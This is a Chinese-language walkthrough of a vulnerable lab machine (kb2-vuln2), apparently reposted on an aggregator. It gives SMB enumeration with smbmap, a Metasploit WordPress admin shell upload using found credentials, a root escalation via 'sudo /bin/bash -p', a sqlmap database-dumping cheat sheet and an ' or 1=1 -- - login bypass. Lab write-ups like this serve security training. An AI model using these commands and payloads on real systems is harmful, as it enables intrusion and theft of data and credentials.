kb2-vuln2(smbmap工具的利用)
Posted 魏钦6666
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了kb2-vuln2(smbmap工具的利用)相关的知识,希望对你有一定的参考价值。
环境准备
靶机链接:百度网盘 请输入提取码
提取码:y4rx
虚拟机网络链接模式:桥接模式
攻击机系统:kali linux 2021.1
提示:如果导入靶机到virtualbox里显示“不能为虚拟电脑打开一个新任务“,打开虚拟机设置,选择USB 1.1控制器就解决了,应该是虚拟机版本和virtualbox版本不一致导致的错误。
信息收集:
用nmap对目标进行端口和服务的详细扫描
漏洞利用
1.由于探测到靶机有smb服务,用smbmap工具查看可利用信息
smbmap -H 192.168.1.104 -u guest //对信息进行枚举
smbclient '\\\\192.168.1.104\\Anoymous' -u guest //查看anonymous
get backup.zip 把文件下载下来
2.unzip backup.zip -d backup //解压到backup文件夹
3.进入backup目录查看文件 发现有一个文本文档
4.得到一个用户名密码 admin MachineBoy141
dirsearch -u 192.168.1.104/wordpress/
扫描到wp-login.php 进行访问 发现网站加载不完全 ,应该存在域名!
5.curl -i -L http://192.168.1.104/wordpress/wp-login.php //查看源码 显示 http response 的头信息,连同网页代码一起
6.发现网址前有一个域名 把域名加到 host里
7.用vi /etc/hosts 打开进行配置 source刷新下
8.再次登录就显示正常网页状态
9.启用msfconsole工具
use exploit/unix/webapp/wp_admin_shell_upload show options set rhost 192.168.1.104 set targeturi /wordpress set username admin set password MachineBoy141 set lport 445 run
权限提升
1.用python反弹交互式shell
python -c "import pty;pty.spawn('/bin/bash')"
2.sudo /bin/bash -p 提权成功!!!
sqlmap工具的利用
sqlmap工具的利用
利用sqlmap工具进行SQLI
找到某个可以发起数据库请求页面,并确定该页面可以SQLI后,可以先用burpsuite抓 个request包
然后把包里的内容保存到文本里,例如SQLI.txt
sudo sqlmap -r SQLI.txt --dbs 发送request,执行注入
sudo sqlmap -r SQLI.txt --current-db 查看当前所在的数据库名称
sudo sqlmap -r SQLI.txt -D \'current db\' --tables 查看当前数据中的table
sudo sqlmap -r SQLI.txt -D \'current db\' -T \'choose tab\' --columns 选择当前数据库中的table并查看column
sudo sqlmap -r SQLI.txt -D \'current db\' -T \'choose tab\' -C \'choose col1,choose col2\' --dump 选择想要查看的column并显示出来
一番操作后便可以得到用户名及由md5加密的密码
将密码解密后便可以用其登录网站管理后台了
简单的SQL注入
在一些admin登录界面可以试试,like this:
输入:
Username:admin
Password:\' or 1=1 -- -
即可登录
本文来自博客园,作者:野荷,转载请注明原文链接:https://www.cnblogs.com/jhinjax/p/17257996.html
以上是关于kb2-vuln2(smbmap工具的利用)的主要内容,如果未能解决你的问题,请参考以下文章
利用object.defineProperty实现数据与视图绑定
自己的微信小程序学习笔记——第三方UI库Lin-Ui的加载及使用
自己的微信小程序学习笔记——第三方UI库Lin-Ui的加载及使用